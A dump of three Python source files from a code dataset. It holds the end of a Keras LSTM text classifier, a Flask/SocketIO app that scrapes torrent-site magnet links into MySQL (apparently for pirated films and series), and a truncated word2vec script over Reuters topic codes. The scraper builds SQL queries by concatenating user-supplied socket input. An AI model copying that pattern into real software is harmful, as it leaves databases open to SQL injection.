enumerate(f):\n data = line.split(' +++$+++ ')\n # 讀入標籤\n label = int(data[0])\n if label == 1:\n y_train.append([0.,1.])\n else:\n y_train.append([1.,0.])\n # 讀入句子\n x_train.append(data[1].strip('\\n'))\n\n x_train = np.array(x_train)\n y_train = np.array(y_train)\n \n return x_train,y_train\n\ndef build_model_1():\n model = Sequential()\n model.add(Embedding(len(tokenizer.word_index)+1, 200, input_length=38, trainable=True))\n model.add(LSTM(256, return_sequences=True, dropout=0.2, recurrent_dropout=0.2))\n model.add(LSTM(256, dropout=0.2))\n model.add(Dense(2, activation='softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n print(model.summary())\n\n return model\n\ndef build_model_2():\n model = Sequential()\n model.add(Embedding(len(tokenizer.word_index)+1, 200, input_length=38, trainable=True))\n model.add(Bidirectional(LSTM(100, return_sequences=True, dropout=0.2, recurrent_dropout=0.2)))\n model.add(Bidirectional(LSTM(64, dropout=0.2, recurrent_dropout=0.2)))\n model.add(Dense(2, activation='softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n print(model.summary())\n \n return model\n\nx_train,y_train = load_data(sys.argv[1])\n\nwith open('tokenizer.pickle', 'rb') as f:\n tokenizer = pickle.load(f)\n\nmax_review_length = 38\nx_train_dictionary=tokenizer.texts_to_sequences(x_train)\nx_train =sequence.pad_sequences(x_train_dictionary, maxlen=max_review_length)\n\nmodel1 = build_model_1()\nmodel2 = build_model_2()\n\nhistory = model1.fit(x_train, y_train,validation_split=0.1, epochs=2, batch_size=128)\nhistory = model2.fit(x_train, y_train,validation_split=0.1, epochs=2, batch_size=128)\n\nmodel1.save_weights(\"model1_weight.h5\")\nmodel2.save_weights(\"model2_weight.h5\")","sub_path":"hw4/hw4_train.py","file_name":"hw4_train.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"359384658","text":"# -*- coding: utf-8 -*-\nfrom requests_html import HTMLSession\nfrom flask import Flask, request, render_template, redirect\nimport imdb\nfrom bson.json_util import dumps\nimport dns\nfrom imdbparser import IMDb\nfrom pymongo import MongoClient\nfrom guessit import guessit\nfrom flask_socketio import SocketIO, emit\nimport logging\nimport threading\nimport os\nimport re\nfrom modulo_mysql import select\n#pip3 install requests_html flask imdbpy bson pymongo dnspython imdbparser guessit flask_socketio mysql-connector\n\nimport libtorrent as lt\nimport time\n\nses = lt.session({\n\t 'upload_rate_limit': 0\n\t,'download_rate_limit': 0\n\t,'active_downloads': -1\n\t,'active_limit': -1\n\t,'alert_mask': 0\n})\n\nses.listen_on(6881, 6891)\nses.add_extension('ut_metadata')\nses.add_extension('ut_pex')\nses.add_extension('smart_ban')\nses.add_extension('metadata_transfer')\nses.add_dht_router(\"router.utorrent.com\", 6881)\nses.add_dht_router(\"router.bittorrent.com\", 6881)\nses.add_dht_router(\"dht.transmissionbt.com\", 6881)\nses.add_dht_router('127.0.0.1',6881) \nses.add_dht_router(\"dht.aelitis.com\", 6881)\nses.start_dht()\nses.start_lsd()\nses.start_natpmp()\nses.start_upnp() \n\n# https://www.btmulu.com/hash/\n# ps -fA | grep main.py\n# kill 509\n\nsession = HTMLSession()\napp = Flask('app')\napp.debug = False\n\nia = imdb.IMDb()\ntop = ia.get_top250_movies()\n\nlog = logging.getLogger('werkzeug')\nlog.setLevel(logging.ERROR)\n\nsocketio = SocketIO(app, async_mode='threading',\n cors_allowed_origins=\"*\", logger=False, engineio_logger=False)\n\nimport os, shutil\nimport time\nimport stat\n\nfolder = 'downloads/'\nif not os.path.exists(folder):\n os.makedirs(folder)\n\nparams = { 'save_path': 'downloads/',\n 'auto_managed': True,\n 'file_priorities': [0]*5}\n\ndef apagar_download():\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n #print('Apagado',file_path)\n socketio.emit('log', 'Apagado: '+file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n #print('Apagado',file_path)\n socketio.emit('log', 'Apagado: '+file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\napagar_download()\n\ndef getConfig(config, default):\n try:\n for r in select('select parametro from configuracao where config=\"'+config+'\"'):\n return int(r[0])\n return default\n except:\n return default\n\n\n \nmagnet_banco = []\nimdb_filme_banco = []\nimdb_serie_banco = [] \n\ndef iniciar_banco():\n try:\n current_day = int(time.strftime(\"%d\", time.localtime()))\n mod_day = int(time.strftime(\"%d\", time.gmtime ( os.stat('magnet_banco.txt') [ stat.ST_MTIME ] ) ))\n if current_day == mod_day:\n read_banco()\n print('banco local',current_day, mod_day)\n else:\n write_banco()\n print('banco web',current_day, mod_day) \n except Exception as e:\n print('Erro Carregando Banco')\n write_banco()\n\n\ndef write_banco():\n rett = select('select distinct(magnet) from registros')\n magnet_banco = []\n with open('magnet_banco.txt', 'w') as filehandle:\n for listitem in rett:\n filehandle.write('%s\\n' % listitem[0])\n magnet_banco.append(listitem[0])\n \n \n rett = select('select distinct(imdb) from registros where Filme = \"Sim\"')\n imdb_filme_banco = []\n with open('imdb_filme_banco.txt', 'w') as filehandle:\n for listitem in rett:\n filehandle.write('%s\\n' % listitem[0])\n imdb_filme_banco.append(listitem[0])\n\n rett = select(\"SELECT distinct(SUBSTRING_INDEX(imdb,' ',1)) FROM registros where Filme = 'Não'\") \n imdb_serie_banco = []\n with open('imdb_serie_banco.txt', 'w') as filehandle:\n for listitem in rett: \n filehandle.write('%s\\n' % listitem[0])\n imdb_serie_banco.append(listitem[0])\n\ndef read_banco():\n with open('magnet_banco.txt', 'r') as filehandle:\n for line in filehandle:\n currentPlace = line[:-1]\n magnet_banco.append(currentPlace)\n with open('imdb_filme_banco.txt', 'r') as filehandle:\n for line in filehandle:\n currentPlace = line[:-1]\n imdb_filme_banco.append(currentPlace)\n with open('imdb_serie_banco.txt', 'r') as filehandle:\n for line in filehandle:\n currentPlace = line[:-1]\n imdb_serie_banco.append(currentPlace)\n\n\n\n\n\n\n\ndef carregar_sky(links): \n print('Início: '+ str(len(links))+\" links\") \n socketio.emit('log', 'Carregando Links: '+str(len(links)))\n socketio.emit('atualizar', 'Detalhes do Link')\n \n\n for l in links: \n print(' ')\n li = l['link']\n try:\n ha = li[20:li.index('&')].lower()\n except:\n print(\"Erro Magnet: \" + li)\n ha = li[20:].lower()\n\n nao_existe = l['link'] not in magnet_banco\n if nao_existe:\n rett = select('select * from registros where magnet=\"'+l['link']+'\" limit 1')\n for x in rett:\n nao_existe = False\n \n imdb_encontrado = len(l['imdb']) > 0 \n \n if imdb_encontrado and nao_existe:\n \n arquivos = [] \n arquivos = carregar_torrent_download(ha)\n \n ind = 0\n for a in arquivos:\n \n a = a.replace('[WWW.BLUDV.TV] ', '').replace(\n 'Acesse o ORIGINAL WWW.BLUDV.TV ', '').replace(\n '[ACESSE COMANDOTORRENTS.COM] ', '').replace(\n 'WWW.COMANDOTORRENTS.COM', '').replace(\n 'WWW.BLUDV.TV', '').replace(\n '[WW.BLUDV.TV]', '').replace('WwW.LAPUMiAFiLMES.COM', '').replace('x264', '').replace('h264', '')\n try:\n\n if (a[-3:] not in ['exe', 'txt', 'url', 'srt', 'peg', 'jpg','png','nfo', 'zip']) and (a[-10:] not in ['sample.mkv']) and (a not in [\"COMANDOTORRENTS.COM.mp4\", \"slotsricos.com.mp4\", \"1XBET.COM_promo_SHREK_dinheiro_livre.mp4\",\"BLUDV.TV.mp4\", \"BLUDV.mp4\",\"LAPUMiA.mp4\",\"File Name\"]) and (\"LEGENDADO\" not in a)and (\"1XBET.COM_promo_SHREK_dinheiro_livre.mp4\" not in a):\n\n convert = guessit(a)\n confirma = isSerie(l['imdb'])\n \n if confirma == \"Sim\": \n \n if 'episode' in convert:\n if not str(convert['episode']).isnumeric(): \n convert.pop('episode') \n \n if 'season' in convert: \n if not str(convert['season']).isnumeric():\n convert.pop('season') \n \n \n if 'season' not in convert:\n se = busca_temporada(a)\n if se:\n convert['season'] = se\n else:\n print('Sessão não encontrado', a)\n \n if 'episode' not in convert:\n se = busca_episodeo(a)\n if se:\n convert['episode'] = se\n else:\n print('Episódio não encontrado', a)\n \n \n \n if 'season' in convert and 'episode' in convert :\n \n sessao = str(convert['season']) \n episode = str(convert['episode'])\n \n im = l['imdb'] + \" \" + sessao + \" \" + episode\n\n ins = {\n 'id': 0,\n 'imdb': im,\n 'magnet': li,\n 'mapa': ind,\n 'nome': a,\n 'Filme':'Não',\n 'origem':l['origem']\n }\n #INSERT INTO `registros`(`imdb`, `magnet`, `mapa`, `nome`, `ano`, `titulo`, `Filme`, `origem`) VALUES ([value-1],[value-2],[value-3],[value-4],[value-5],[value-6],[value-7],[value-8])\n insert = \"INSERT INTO registros VALUES ('\"+im+\"','\"+li+\"','\"+str(ind)+\"','\"+a+\"',0,'','Não','')\"\n \n #print(insert)\n select(insert)\n print(im, ind, convert['title'], a)\n if ('NOS4A2' in a) or ('nos4a2' in a):\n socketio.emit('atualizar', 'Adicionado: NOS4A2 (' + im + \") \"+ a)\n else:\n socketio.emit('atualizar', dumps(ins))\n socketio.emit('log', 'Adicionado: '+im +\" \"+ convert['title'] +\" \"+a)\n else:\n \n socketio.emit('log', \"Sessão ou Episódio não identificado: \"+a)\n\n if confirma == \"Não\":\n ins = {'id': 0,'imdb': l['imdb'],'magnet': li,'mapa': ind,'nome': a, 'Filme':'Sim','origem':l['origem']}\n insert = \"INSERT INTO registros VALUES ('\"+l['imdb']+\"','\"+li+\"','\"+str(ind)+\"','\"+a+\"',0,'','Sim','')\"\n #print(insert)\n select(insert)\n \n socketio.emit( 'atualizar', dumps(ins))\n print(l['imdb'], ind, convert['title'], a)\n socketio.emit('log', 'Adicionado: '+l['imdb'] +\" \"+ convert['title'] +\" \"+a)\n \n if confirma == \"Erro\":\n print(\"Erro Identificando IMDB: \",l['imdb'])\n socketio.emit('log', \"Erro Identificando IMDB: \"+l['imdb'])\n \n\n except Exception as e:\n print('Erro',e)\n socketio.emit('log', 'Erro Carregando: '+ ha +\" \"+ a)\n\n ind = ind + 1\n \n if len(arquivos)==0:\n print('Metadado não encontrado: ' + ha) \n socketio.emit('log', 'Metadado não encontrado: ' + ha)\n\n else:\n if not imdb_encontrado:\n socketio.emit('log', 'IMDB não Encontrado: ' + ha)\n print('IMDB não Encontrado: ' + ha)\n if not nao_existe:\n socketio.emit('log', 'Já Existe: ' + ha)\n print('Já Existe: ' + ha)\n \n\n socketio.emit('atualizar', 'Fim da Busca')\n socketio.emit('log', 'Fim da Busca')\n limpar()\n\ndef busca_temporada(nome):\n se = re.findall(' ([0-9]) Tempo| ([0-9][0-9]) Tempo| ([0-9])ª Tempo| ([0-9][0-9])ª Tempo| \\.([0-9])ª Tempo| \\.([0-9][0-9])ª Tempo', nome, re.IGNORECASE)\n if len(se) > 0:\n for r in se[0]:\n if len(r) > 0: \n return r\n return \"\"\n\ndef busca_episodeo(nome):\n se = re.findall('/([0-9]) - |/([0-9][0-9]) - |/([0-9])-|/([0-9][0-9])-|/([0-9][0-9]) |[0-9]\\.([0-9][0-9]) ', nome, re.IGNORECASE)\n if len(se) > 0:\n for r in se[0]:\n if len(r) > 0: \n return r\n return \"\"\n\nseries_filme = {} \n\ndef isSerie(imdb, seq=0):\n try:\n im = str(imdb).strip()[2:]\n if str(imdb).strip() in imdb_filme_banco:\n return \"Não\"\n if str(imdb).strip() in imdb_serie_banco:\n return \"Sim\"\n \n if series_filme.get(im) == None: \n movie = ia.get_movie(im)\n if movie.get('title') != None:\n if movie.get('seasons') == None:\n series_filme[im] = \"Não\"\n return \"Não\"\n else:\n series_filme[im] = \"Sim\"\n return \"Sim\"\n else:\n return \"Erro\"\n else:\n return series_filme.get(im)\n except:\n if seq==1:\n print('Erro Tentativa isSerie 2', imdb)\n return \"Erro\"\n else:\n print('Erro Tentativa isSerie 1', imdb)\n return isSerie(imdb, 1)\n \n\n \ndef carregar_torrent_download(link, tempo=10):\n r=[]\n \n handle = lt.add_magnet_uri(ses, \"magnet:?xt=urn:btih:\"+link, params)\n handle.set_sequential_download(1)\n handle.resume()\n \n contador = 0 \n socketio.emit('log', 'Esperando Download do Torrent!')\n \n while (not handle.has_metadata() and contador < tempo): \n contador += 1\n time.sleep(2)\n \n if handle.has_metadata():\n torinfo = handle.get_torrent_info()\n\n for x in range(torinfo.files().num_files()):\n r.append(torinfo.files().file_path(x))\n #print(torinfo.files().file_path(x))\n\n ses.remove_torrent(handle)\n \n apagar_download()\n return r\n\ndef limpar():\n\n select(\"delete FROM registros where nome like '%.jpg' or nome like '%.str' or nome like '%.url' or nome like '%.exe' or nome like '%.sub' or nome like '%.txt' or nome like '%.nfo' or nome like '%.jpeg' or nome like '%.png' or nome like '%.zip' or nome like '%sample%' or nome = '1XBET.COM_promo_SHREK_dinheiro_livre.mp4' or nome like '%HDCAM%' or nome = 'slotsricos.com.mp4' or nome = 'BLUDV.TV.mp4' or nome = 'LAPUMiA.mp4' or nome = 'COMANDOTORRENTS.COM.mp4'\")\n\n rett = select(\"SELECT magnet, mapa FROM registros group by magnet, mapa having count(magnet) > 1 and count(mapa) > 1\")\n for r in rett:\n #print('delete from registros where magnet=\"'+r[0]+'\" and mapa ='+str(r[1])+' limit 1')\n select('delete from registros where magnet=\"'+r[0]+'\" and mapa ='+str(r[1])+' limit 1')\n \n \n corrigir_titulo()\n \n\ndef corrigir_titulo():\n print('corrigir_titulo: Iniciado') \n rett = select(\"SELECT distinct(SUBSTRING_INDEX(imdb,' ',1)) as im FROM registros where titulo = ''\")\n for r in rett:\n # print(r)\n try:\n print(r[0])\n im = str(r[0]).strip()[2:]\n movie = ia.get_movie(str(im)) \n titu = movie.get('title').replace(\"'\",\"\") \n print(titu)\n print(movie.get('year'))\n if movie.get('year')!=None:\n #print(\"update registros set titulo = '\"+movie.get('title')+\"', ano = \"+str(movie.get('year'))+\" where imdb like '%\"+str(im)+\"%'\")\n select(\"update registros set titulo = '\"+titu+\"', ano = \"+str(movie.get('year'))+\" where imdb like '%\"+str(im)+\"%'\")\n except Exception as e: \n print(e) \n print('Erro Sem Título: ', im)\n \n\n@app.route('/link')\ndef link():\n q = request.args.get(\"q\")\n i = request.args.get(\"i\")\n print(q)\n if (q != None):\n socketio.start_background_task(thread_link, q, i)\n return redirect(\"/\", code=302)\n\n\n@app.route('/')\ndef hello_world():\n q = request.args.get(\"q\")\n print(q)\n if (q != None):\n lin = \"https://ondeeubaixo.net/index.php?campo1=\" + q + \"&nome_campo1=pesquisa&categoria=lista&\"\n socketio.start_background_task(thread_lista, lin, 3)\n return render_template('busca.html')\n\n\ndef processa_pagina(link, id_imdb, ret, imdb_pref=\"\", origem=\"\"):\n\n \n r2 = session.get(link)\n if len(id_imdb) == 0:\n try:\n id_imdb = r2.html.find(\"a[href*='www.imdb.com']\", first=True).attrs['href']\n id_imdb = id_imdb.replace(\"http://www.imdb.com/title/\", \"\").replace(\"https://www.imdb.com/title/\", \"\").replace(\"/\", \"\").replace(\"/\", \"\").replace(\"?ref_=nv_sr_\", \"\").replace(\"?ref_=plg_rt_1\", \"\").replace(\"http:www.imdb.com\", \"\").replace(\"https:www.imdb.com\", \"\").strip()\n except:\n print('Erro Convertendo IMDB', link)\n id_imdb = \"\"\n\n if len(imdb_pref) > 0:\n if id_imdb == imdb_pref:\n for html in r2.html.find('a[href^=\"magnet\"]'):\n ret.append({'imdb': id_imdb, 'link': list(html.links)[0], 'origem':origem})\n \n else: \n for html in r2.html.find('a[href^=\"magnet\"]'):\n ret.append({'imdb': id_imdb, 'link': list(html.links)[0], 'origem':origem})\n \ndef thread_link(link, imdb):\n \n print(imdb, link)\n socketio.emit('atualizar', 'Carregando: ' + link)\n socketio.emit('log', 'Carregando: '+link)\n s = []\n processa_pagina(link, imdb, s,\"\",\"link\") \n carregar_sky(s)\n\n\ndef thread_lista(url, tamanho):\n s = []\n \n for x in range(1, tamanho):\n print(url + str(x)) \n r = session.get(url + str(x))\n titulos = r.html.find('.list-inline > li')\n for elem in titulos: \n link = elem.find('a', first=True).attrs['href']\n dublado = elem.find('.idioma_lista', first=True).text.strip() \n if dublado == \"Dublado\":\n print(link)\n socketio.emit('log', 'Carregando: '+link)\n socketio.emit('atualizar', 'Link: ' + link)\n processa_pagina(link, \"\", s,\"\",\"lancamentos\")\n \n carregar_sky(s)\n\ndef thread_busca(url, tamanho, imdb):\n s = [] \n for x in range(1, tamanho):\n print(url + str(x)) \n r = session.get(url + str(x))\n titulos = r.html.find('.list-inline .semelhantes')\n for elem in titulos: \n link = elem.find('a', first=True).attrs['href']\n print(link)\n socketio.emit('atualizar', 'Link: ' + link)\n socketio.emit('log', 'Carregando: '+link)\n processa_pagina(link, \"\", s, imdb, \"buscar\") \n \n carregar_sky(s)\n\n\ndef thread_lista_preferidos():\n s = []\n \n for pref in select('select * from preferidos'):\n \n r = session.get(\"https://ondeeubaixo.net/index.php?campo1=\" + pref[0] + \"&nome_campo1=pesquisa&categoria=lista&\")\n titulos = r.html.find('.list-inline .semelhantes')\n for elem in titulos: \n link = elem.find('a', first=True).attrs['href']\n print(link)\n socketio.emit('atualizar', 'Link: ' + link)\n socketio.emit('log', 'Carregando: '+link)\n processa_pagina(link, \"\", s, pref[1],\"lancamentos\") \n \n carregar_sky(s)\n\n\n@socketio.on('preferido')\ndef preferido(im, nome):\n print(\"Preferido:\" + im) \n select('insert into preferidos values(\"'+nome+'\", \"'+im+'\")')\n socketio.emit('resposta_funcoes', 'Adicionado ao Preferidos: ' + nome)\n socketio.emit('log', 'Adicionado ao Preferidos: ' + nome)\n\n\n@socketio.on('remove_preferido')\ndef remove_preferido(im):\n print(\"Não Preferido:\" + im)\n select('delete from preferidos where imdb =\"'+im+'\"') \n socketio.emit('resposta_funcoes', 'Removido dos Preferidos: ' + im)\n socketio.emit('log', 'Removido dos Preferidos: ' + im)\n\n\n@socketio.on('apagar')\ndef apagar(im):\n print(\"Apagado: \" + im)\n select('delete from registros where imdb like \"%'+im+'%\"')\n \n socketio.emit('resposta_funcoes', 'Apagado: ' + im)\n socketio.emit('log', 'Apagado: ' + im)\n\n@socketio.on('carregar_lancamentos')\ndef sock_lancamento(): \n nav = sock_navegar()\n seq = 1\n for n in nav:\n im_n = n['link'][7:16] \n for b in select('select * from registros where imdb like \"%'+im_n+'%\" limit 1'):\n socketio.emit('atualizar', dumps({'imdb':b[0],'magnet':b[1],'mapa':b[2],'nome':b[3],'ano':b[4],'titulo':b[5],'Filme':b[6],'origem':'salvos'}))\n seq = seq + 1\n\n@socketio.on('config')\ndef config(c,parametro):\n print(\"Configurado: \" + c,parametro)\n select('delete from configuracao where config=\"'+c+'\"')\n select('insert into configuracao values(\"'+c+'\", \"'+parametro+'\")')\n socketio.emit('log', 'Config Adicionada: ' + c +' '+parametro)\n\n \ndef sock_navegar():\n s = [] \n r = session.get('https://www.imdb.com/chart/moviemeter?sort=us,desc&mode=simple&page=1')\n titulos = r.html.find('.lister-list tr .titleColumn')\n for elem in titulos:\n link = elem.find('a', first=True).attrs['href']\n ano = elem.find('span', first=True).text\n titulo = elem.find('a', first=True).text.strip()\n s.append({'link':link, 'ano':ano, 'titulo':titulo+' (Filme)'}) \n \n r = session.get('https://www.imdb.com/chart/tvmeter?sort=us,desc&mode=simple&page=1')\n titulos = r.html.find('.lister-list tr .titleColumn')\n for elem in titulos:\n link = elem.find('a', first=True).attrs['href']\n ano = elem.find('span', first=True).text\n titulo = elem.find('a', first=True).text.strip()\n s.append({'link':link, 'ano':ano, 'titulo':titulo+' (Série)'}) \n \n return s\n\n@socketio.on('link')\ndef sock_link(message, im):\n socketio.emit('limpar')\n print(message+\" \"+im)\n socketio.start_background_task(thread_link, message, im)\n\n@socketio.on('buscar')\ndef sock_buscar(message, imdb):\n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: ' + message)\n socketio.emit('log', 'Buscando: ' + message)\n \n lin = \"https://ondeeubaixo.net/index.php?campo1=\" + message + \"&nome_campo1=pesquisa&categoria=lista&\"\n socketio.start_background_task(thread_busca, lin, getConfig('tamanho', 3), imdb)\n\n\n@socketio.on('lista')\ndef sock_lista(message):\n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: ')\n socketio.emit('log', 'Buscando: ') \n socketio.start_background_task(thread_lista, message, getConfig('tamanho', 3))\n\n@socketio.on('lista_preferidos')\ndef sock_lista_preferidos():\n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: ')\n socketio.emit('log', 'Carregando Preferidos: ')\n \n socketio.start_background_task(thread_lista_preferidos)\n\n@socketio.on('inicio')\ndef sock_iniciado():\n print('inicio')\n # socketio.start_background_task(thread_lista, 'https://ondeeubaixo.net/lancamentos-', 3)\n\n@socketio.on('parar')\ndef parar():\n print(\"Parando\")\n \n\n@socketio.on('carregar_preferidos')\ndef sock_preferidos():\n \n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: ')\n \n for b in select('select * from preferidos'):\n socketio.emit('atualizar', dumps({'nome': b[0], 'imdb':b[1], 'origem':'preferidos'}))\n socketio.emit('atualizar', 'Fim da Busca')\n\n@socketio.on('buscar_im')\ndef buscar_im(nome): \n socketio.emit('limpar')\n socketio.emit('atualizar', 'Buscando: '+nome)\n print(\"Buscando IMDB: \" + nome)\n for b in select('select * from registros where nome like \"%'+nome+'%\" or titulo like \"%'+nome+'%\" or imdb like \"%'+nome+'%\" order by imdb desc'):\n socketio.emit('atualizar', dumps({'imdb':b[0],'magnet':b[1],'mapa':b[2],'nome':b[3],'ano':b[4],'titulo':b[5],'Filme':b[6],'origem':'salvos'}))\n socketio.emit('atualizar', 'Fim da Busca')\n\n@socketio.on('connect')\ndef test_connect():\n print('conectado')\n\n@socketio.on('tabela')\ndef sock_tabela():\n print('tabela')\n socketio.emit('log', 'Carregando Tabela')\n tabela = []\n for b in select('select * from registros order by imdb desc'):\n tabela.append({'imdb':b[0],'magnet':b[1],'mapa':b[2],'nome':b[3],'ano':b[4],'titulo':b[5],'Filme':b[6],'origem':b[7]})\n socketio.emit('carregar_tabela', dumps(tabela))\n\nlimpar()\niniciar_banco()\n\n#socketio.start_background_task(thread_link, \"https://ondeeubaixo.net/greys-anatomy-a-anatomia-de-grey-10-temporada-completa-torrent\", \"\")\n\n \nif __name__ == \"__main__\":\n socketio.run(app, debug=False, host='0.0.0.0', port=5000)\n\n\n\n","sub_path":"Buscar/buscar_mysql.py","file_name":"buscar_mysql.py","file_ext":"py","file_size_in_byte":24634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"7609707","text":"import sys\nimport tweepy\nimport json\nimport subprocess\nimport datetime\nimport MeCab\nimport os\nimport warnings\nwarnings.filterwarnings(action='ignore', category=UserWarning, module='gensim')\nfrom gensim.models import word2vec\nbase = 'C:/01.work/01.python/998.data/888.TwoSigma'\nos.chdir(base)\n# data = word2vec.Text8Corpus('aa.txt')\ndata=[['CRU', 'CN', 'RTRS', 'ENR', 'LEN', 'EMRG', 'NGS', 'ASIA'],\n['BD', 'INS', 'LATAM', 'CA', 'US', 'MX', 'IL', 'LIF', 'RTRS', 'FEA', 'LEN', 'MEAST', 'CO', 'ASIA', 'HT'],\n['IQ', 'RO', 'US', 'ID', 'RET', 'RTRS', 'ENR', 'PRESS', 'BG', 'LEN', 'TH', 'NGS', 'BY'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['PUB', 'BUS', 'INS', 'CA', 'ENT', 'US', 'FIN', 'SFWR', 'RTRS', 'WWW', 'PRESS', 'USC', 'LEI', 'FUND', 'LEN'],\n['US', 'NEWR', 'LEN', 'DRU'],\n['JOB', 'US', 'NEWS', 'DRV', 'MUNI', 'STX', 'FIN', 'IND', 'GB', 'BNK', 'ENR', 'AU', 'LEN', 'RTRS', 'MCE', 'RESF', 'AUT'],\n['JOB', 'US', 'NEWS', 'DRV', 'MUNI', 'STX', 'FIN', 'IND', 'GB', 'BNK', 'ENR', 'AU', 'LEN', 'RTRS', 'MCE', 'RESF', 'AUT'],\n['JOB', 'US', 'NEWS', 'DRV', 'MUNI', 'STX', 'FIN', 'IND', 'GB', 'BNK', 'ENR', 'AU', 'LEN', 'RTRS', 'MCE', 'RESF', 'AUT'],\n['BD', 'INS', 'LATAM', 'CA', 'US', 'MX', 'IL', 'LIF', 'RTRS', 'FEA', 'LEN', 'MEAST', 'CO', 'ASIA', 'HT'],\n['BACT', 'US', 'NEWR', 'DRU', 'LEN'],\n['BACT', 'BUS', 'US', 'DPR', 'TEL', 'NEWR', 'LEN', 'WWW'],\n['HDWR', 'US', 'REGS', 'TEL', 'APL', 'ELC', 'RTRS', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['HDWR', 'US', 'REGS', 'TEL', 'APL', 'ELC', 'RTRS', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['DE', 'JOB', 'WEU', 'TEL', 'ELC', 'TW', 'RTRS', 'LEN', 'EUROPE', 'ASIA', 'BKRT'],\n['BACT', 'PUB', 'REC', 'DPR', 'TEL', 'NEWR', 'IL', 'MRG', 'TBCS', 'WWW', 'LEN', 'LEI', 'EMRG', 'MEAST'],\n['US', 'TEL', 'IL', 'MRG', 'RTRS', 'LEN', 'EMRG', 'MEAST'],\n['FR', 'WEU', 'MRG', 'BNK', 'RTRS', 'LEN', 'EUROPE'],\n['FR', 'WEU', 'MRG', 'BNK', 'RTRS', 'LEN', 'EUROPE'],\n['FR', 'WEU', 'MRG', 'BNK', 'RTRS', 'LEN', 'EUROPE'],\n['BD', 'INS', 'LATAM', 'CA', 'US', 'MX', 'IL', 'LIF', 'RTRS', 'FEA', 'LEN', 'MEAST', 'CO', 'ASIA', 'HT'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['PUB', 'JP', 'CA', 'ENT', 'US', 'FILM', 'LIF', 'RTRS', 'LEN', 'LEI'],\n['AU', 'RTRS', 'PRESS', 'LEN', 'ASIA'],\n['AU', 'RTRS', 'PRESS', 'LEN', 'ASIA'],\n['AU', 'RTRS', 'PRESS', 'LEN', 'ASIA'],\n['WEU', 'MRG', 'GB', 'AU', 'RTRS', 'MY', 'LEN', 'EMRG', 'EUROPE', 'ASIA', 'AIR'],\n['LATAM', 'MX', 'BEV', 'RTRS', 'LEN', 'EMRG'],\n['FR', 'ID', 'WEU', 'IN', 'DRU', 'RTRS', 'LEN', 'EMRG', 'TH', 'EUROPE'],\n['STX', 'TW', 'RTRS', 'LEN', 'EMRG', 'ASIA'],\n['STX', 'TW', 'RTRS', 'LEN', 'EMRG', 'ASIA'],\n['GB', 'RTRS', 'PRESS', 'LEN'],\n['JP', 'STL', 'CRU', 'TEL', 'HK', 'IN', 'CN', 'RTRS', 'ENR', 'PRESS', 'LEN', 'ASIA', 'AUT'],\n['ID', 'TEL', 'RTRS', 'ENR', 'LEN', 'EMRG', 'FUND', 'ASIA'],\n['STX', 'TW', 'RTRS', 'LEN', 'EMRG', 'HOT', 'ASIA'],\n['RET', 'ELG', 'DIV', 'RTRS', 'ENR', 'LEN', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['XREF', 'RET', 'ELG', 'DIV', 'RTRS', 'ENR', 'LEN', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['GB', 'RTRS', 'PRESS', 'LEN'],\n['GB', 'RTRS', 'PRESS', 'LEN'],\n['GB', 'RTRS', 'PRESS', 'LEN'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'EUROPE', 'ASIA', 'AUT'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'EUROPE', 'XREF', 'ASIA', 'AUT'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'EUROPE', 'XREF', 'ASIA', 'AUT'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'EUROPE', 'XREF', 'ASIA', 'AUT'],\n['ID', 'NEWS', 'MRG', 'GB', 'AU', 'RTRS', 'MY', 'LEN', 